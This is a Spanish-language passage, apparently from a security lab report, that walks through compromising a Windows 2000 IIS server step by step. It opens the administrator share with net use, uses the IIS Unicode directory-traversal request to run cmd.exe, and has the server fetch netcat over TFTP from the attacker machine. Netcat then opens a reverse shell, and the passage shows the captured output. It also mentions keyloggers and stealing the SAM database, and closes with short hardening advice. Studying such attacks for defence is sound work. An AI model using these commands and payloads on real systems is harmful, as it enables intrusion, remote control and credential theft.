Ilustración 3 Ataque a Contraseñas Los datos y el ataque realizado es real♣, Estas cuentas son reales, se escogieron las cuentas mas representativas creadas por el administrador, las Cuentas del sistema como Krtbtgt, TsInternetUser, IUSR_WIN2000 IWAM_WIN2000 etc... no se tuvieron encuanta así como las des activadas.

Crear una consola remota ATAQUE CONSOLA REMOTA

Narración

Paso Uno Ejecutar net use asi: C:\>net use \\192.168.0.3\ipc$ 1234 /u: administrador Se ha completado el comando correctamente.

Como conocemos la contraseña del administrador Intentamos hacer una conexión como administrador

Paso Dos Ejecutar net use asi: C:\>net use * \\192.168.0.3\c$

Conectamos una nueva unidad de red, el dispositivo C del equipo 192.168.0.3 a una unidad No usada, en este caso Y:

♣ El tiempo tomado para crakerar fue alrededor de 7 minutos en estas condiciones, pero una sola contraseña como Aad456j$23%tg&34/(67),?[{Fadr45212 puede ser virtualmente inviolable pues los tiempos de espera serian de muchos años, posiblemente cientos o miles, es decir el uso de mayúsculas minúsculas , números, caracteres especiales y larga, pero con más velocidad de proceso, mejores algoritmos, y uso de computación distribuida, puede reducir la cantidad de tiempo.


La unidad Y: está conectada a \\192.168.0.3\c$. Se ha completado el comando correctamente.

Y: es una unidad de red de nuestro equipo al equipo Victima (No necesariamente compartido explícitamente por la victima)

Paso Tres

Creamos una consola en modo de escucha en nuestro equipo

Paso Cuatro Copiamos NETCAT NC.exe al equipo victima

El acante puede registrar las pulsaciones del teclado como, Invisible KeyLogger Sealt (IKS) , o usar FrakeGINA, intentamos no atacar el sevicio de Web sino tomar el servidor que aloja la pagina web.

Mostrando el directorio C: del servidor con IIS

Narración

PASO uno C:\>nc -vv 192.168.3 80 WIN2000 [192.168.0.3] 80 (http) open

Paso dos GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c +dir+c:\ HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 23 Jul 2003 22:47:28 GMT Content-Type: application/octet-stream El volumen de la unidad C no tiene etiqueta. El n·mero de serie del volumen es: 607C-47F0 Directorio de c:\ 22/07/2003 12:43 <DIR> Archivos de programa 22/07/2003 12:59 <DIR> Documents and Settings 22/07/2003 12:40 <DIR> Inetpub 23/07/2003 16:42 <DIR> WINNT 1 archivos 59.392 bytes 4 dirs 646.021.120 bytes libres sent 60, rcvd 602: NOTSOCK

Creando una consola remota Con el descubrimiento anterior podemos usando TFTP copiar Netcat a nuestra victima 192.168.0.3 o www.win2000.rcgcalume.org, antes debe preparar un servidor TFTP que pueda enviar el archivo NC.EXE (NetCat)


Crear consolas remotas

Narración

Paso uno C:>nc -vv 192.168.0.3 80 WIN2000 [192.168.0.3] 80 (http) open

Paso dos GET /scripts/..%c0%af../winnt/system32/tftp.exe? "-i"+192.168.0.1+GET+nc.exe+c:\nc.exe HTTP/1.0 HTTP/1.1 502 Error de la puerta de enlace o gateway Server: Microsoft-IIS/5.0 Date: Wed, 23 Jul 2003 23:41:21 GMT Content-Length: 321 Content-Type: text/html <head><title>Error en aplicaci¾n CGI</title></head> <body><h1>Error CGI</h1>La aplicaci¾n CGI especificada puede comportarse de form a anormal si no recibe un conjunto completo de encabezados HTTP. Los encabezados retornados son:<p><p><pre>c:\inetpub\scripts\..\..\winnt\system32\tftp.exe: 'c: \' es un directorio. </pre>sent 91, rcvd 486: NOTSOCK

Fuerza a correr el cliente TFTP del servidor Haciendo que se copie NC en el c:\ Por comodidad se puede copiar tambien el archivo cmd.exe

Paso tres C:\nc>nc -l -p 3000 -nvv listening on [any] 3000 ...

En el Equipo atacante creamaos una consoloa de escucha por el puerto 3000

Paso cuatro Luego de corremos nc en la victima C:\instaladores\herramientas red\nc>nc -vv 192.168. 3 80 WIN2000 [192.168.0.3] 80 (http) open GET /scripts/..%c0%af../nc.exe?+"-e"+cmd.exe+"-n" +192.168.0.1+3000

Luego digamos a NC qie cree una consola remota a nuestro pc, recuerde atacante es 192.168.0.1 la victima es 192.168.0.3

Paso cinco connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 1958 Microsoft Windows 2000 [Versión 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. c:\inetpub\scripts>

Luego de hacer el paso 4 en la consola de escucha (creada en el paso 3) Se crea una consola CMD en el equpp atacante generada desde el equipo Victima Esta consola es equivalente a estar en el equipo victima. (con todos sus efectos)

Tabla 11 Creación de consola remotas En este nivel el atacante puede crear cuentas paralelas al administrador, puede “robar ” y desencriptar totalmente la bases dedatos SAM, borrar cualquier huella, mantenerse invisible y robar información corporativo así como saltar a otros sistemas. Algunas medidas de segurudad, nunca use FAT, use siempre NTFS, (aunque los ataques anteriores se realizaron con NTFS, y no hay directorios compatidos


La gran falla esta en que el atacante puede predecir donde estan los directorios como: C:\winnt C:\winnt\system32 C:\inetpub C:\inetpub\scripts La recomendación es cambiar las rutas por defecto, como minimo, ademas el directorio C:\inetpub debe estar en otra unidad. Otro problema es que no basta NO compartir, de deben quitar los permisos de escritura, y ejecución para Cualquier otro no autorizado explícitamente.